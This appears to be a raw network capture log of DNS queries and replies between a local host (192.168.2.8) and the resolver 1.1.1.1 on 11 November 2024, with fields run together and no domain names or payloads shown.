                                                                                                                                                                                                              Nov 11, 2024 18:34:07.743200064 CET5791553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.743783951 CET6133353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.746655941 CET53654961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.747718096 CET53626431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.748555899 CET5669153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.751512051 CET53613331.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.755696058 CET5203153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.755928040 CET5174853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.756292105 CET53545981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.766062021 CET53520311.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.766264915 CET53517481.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.775412083 CET53579151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.780220985 CET53566911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.794295073 CET6113253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.798870087 CET5308353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.798911095 CET5883553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.800888062 CET5842153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.802038908 CET5098053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.802679062 CET5500553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.803550959 CET5891453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.804238081 CET4979553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.805500031 CET6214153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.806296110 CET5422553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.807847023 CET4936553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.808106899 CET53530831.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.808420897 CET5313253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.809267044 CET5526853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.809288025 CET53588351.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.809858084 CET5928553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.811394930 CET53584211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.811701059 CET53550051.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.811753035 CET5193853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.813304901 CET6451453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.814342022 CET53589141.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.815222025 CET53497951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.817044020 CET53542251.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.817264080 CET53621411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.818279982 CET53493651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.818497896 CET53531321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.818825006 CET53552681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.819773912 CET53509801.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.821830988 CET53519381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.825875998 CET5082453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.825884104 CET53611321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.826457024 CET5353553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.827162981 CET6520553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.827452898 CET5905453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.827589035 CET5343453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.827869892 CET5526653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.829680920 CET5367453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.829885960 CET6529353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.830128908 CET6409753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.833055973 CET5804053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.833592892 CET5530153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.834233046 CET6105953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.834705114 CET6329553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.836385012 CET53535351.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.836560011 CET6538753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.836944103 CET53508241.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.837203979 CET53652051.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.837699890 CET53552661.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.837718964 CET53590541.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.838592052 CET53534341.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.840137005 CET53652931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.842976093 CET53592851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.843390942 CET6085153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.843789101 CET6356353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.844122887 CET5714553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.844273090 CET53632951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.844602108 CET6391453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.846277952 CET5939853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.846326113 CET53645141.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.847033978 CET6418653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.847218990 CET5010053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.853552103 CET5729953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.853735924 CET6061353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.854193926 CET4993353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.854335070 CET53639141.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.854382038 CET5788453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.854507923 CET5483653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.854607105 CET53571451.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.854617119 CET53635631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.854804039 CET5481853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.855664968 CET6051253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.855681896 CET5737053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.855907917 CET53593981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.855952024 CET4995153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.856611967 CET6538853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.857275963 CET5560253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.857331991 CET53501001.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.858649015 CET5161053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.859077930 CET4968953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.859440088 CET5646153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.860905886 CET6336953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.861829042 CET53548181.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.861887932 CET53640971.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.862096071 CET53536741.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.863219976 CET53606131.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.863557100 CET53499511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.864041090 CET53578841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.864263058 CET53580401.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.864475012 CET53610591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.864623070 CET53572991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.864829063 CET53553011.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.865291119 CET53548361.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.865406036 CET53605121.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.865881920 CET53573701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.866871119 CET53653881.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.867455959 CET53653871.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.868459940 CET53516101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.869359016 CET53564611.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.870141029 CET53496891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.870629072 CET53633691.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.875801086 CET53608511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.877994061 CET53641861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.885104895 CET53499331.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.890130997 CET53556021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.479538918 CET5894253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.486742020 CET5933153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.487540960 CET6359453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.498217106 CET53593311.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.501358986 CET5041053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.501727104 CET5279653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.502567053 CET5156953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.511598110 CET53589421.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.511831045 CET53504101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.511950970 CET53527961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.513545036 CET53515691.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.519474030 CET6078253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.519582987 CET53635941.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.519723892 CET5041253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.519973040 CET5015153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.523566008 CET5456653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.524878025 CET5381653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.526012897 CET5399653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.527579069 CET53504121.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.529757023 CET53501511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.530137062 CET53607821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.536529064 CET53539961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.543371916 CET5689253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.543418884 CET5192153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.545770884 CET5817753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.547274113 CET5866853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.547509909 CET5368853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.549329996 CET5581253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.549791098 CET5700353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.552922010 CET4916953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.553189039 CET53568921.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.553375959 CET5510553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.554821014 CET6047953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.555526018 CET53545661.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.555649996 CET53538161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.557312965 CET5365953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.557380915 CET53581771.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.558737993 CET53570031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.563025951 CET53491691.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.565393925 CET53536591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.566222906 CET53604791.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.568737984 CET5343253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.572643042 CET6451353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.573024988 CET6032153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.573024988 CET5408553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.575156927 CET53519211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.577939987 CET53586681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.578638077 CET53536881.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.579391956 CET53534321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.580053091 CET53603211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.581315994 CET53558121.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.583102942 CET53645131.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.583112001 CET53540851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.584625006 CET53551051.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.585411072 CET5615353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.593684912 CET5502253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595535994 CET4950353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595712900 CET6150053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595741987 CET6505953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595901012 CET5231553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595940113 CET5920853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596086025 CET6392253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596117973 CET5170653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596263885 CET6011653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596323967 CET6475953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596431017 CET5996853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596601009 CET5609553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596615076 CET5535553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596771955 CET5937853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596944094 CET6054653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596998930 CET6247853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597146988 CET4954253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597188950 CET6346653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597312927 CET5473853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597387075 CET5035653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597511053 CET6044353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597553015 CET5269053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597701073 CET5307553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597729921 CET5094853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597879887 CET5455853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597908020 CET5492953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598092079 CET6219553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598166943 CET5097853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598303080 CET5408753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598450899 CET5921353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598594904 CET6202353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598748922 CET5617353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.601948023 CET5464353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.602576971 CET53523151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.604012012 CET53601161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.604028940 CET53550221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.605130911 CET53495031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.605899096 CET53639221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.606926918 CET53517061.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.607844114 CET53621951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.608220100 CET53553551.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.608246088 CET53604431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.608556032 CET53561731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.608572960 CET53495421.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.608638048 CET53509481.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.608716011 CET53560951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.608788013 CET53546431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.608823061 CET53605461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.609050989 CET53599681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.609153032 CET53624781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.609328985 CET53549291.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.609469891 CET53592131.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.609924078 CET53620231.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.609936953 CET53545581.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.610739946 CET53530751.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.613533974 CET53650591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.613543987 CET53615001.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.613892078 CET53526901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.618988991 CET53561531.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.620779037 CET5867653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.620939970 CET5818153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.621402025 CET5908453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.627377033 CET53592081.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.627748966 CET53647591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.629535913 CET53503561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.629976034 CET53593781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.629985094 CET53540871.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.630615950 CET53509781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.630872011 CET53590841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.631309032 CET53586761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.631383896 CET53547381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.633322954 CET53634661.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.653824091 CET53581811.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.313173056 CET5775153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.315349102 CET4937053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.318268061 CET5557653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.319226980 CET6101753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.323590994 CET5317153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.323723078 CET5764653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.324321985 CET53577511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.324466944 CET5332053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.325053930 CET5502753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.325093985 CET53493701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.325953007 CET5673853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.326107025 CET5718653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.326531887 CET5586653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.326915026 CET5496653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.327419996 CET6298553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.328238010 CET53555761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.330673933 CET5633853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.331782103 CET5178453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.332123995 CET5260953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.332974911 CET5871853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.334126949 CET6206453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.334157944 CET53576461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.335298061 CET5718453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.336081028 CET53567381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.338115931 CET53629851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.338259935 CET53558661.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.339653969 CET5048653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.341032028 CET53517841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.341970921 CET6204153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.342108011 CET5130553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.342547894 CET5204753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.342835903 CET53587181.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.342854023 CET53620641.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.346410036 CET53549661.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.351902008 CET53610171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.352669954 CET53520471.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.355798006 CET53531711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.355956078 CET53533201.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.356643915 CET53571861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.357111931 CET53550271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.357134104 CET6067053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.357623100 CET6028553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.357988119 CET5532253192.168.2.81.1.1.1
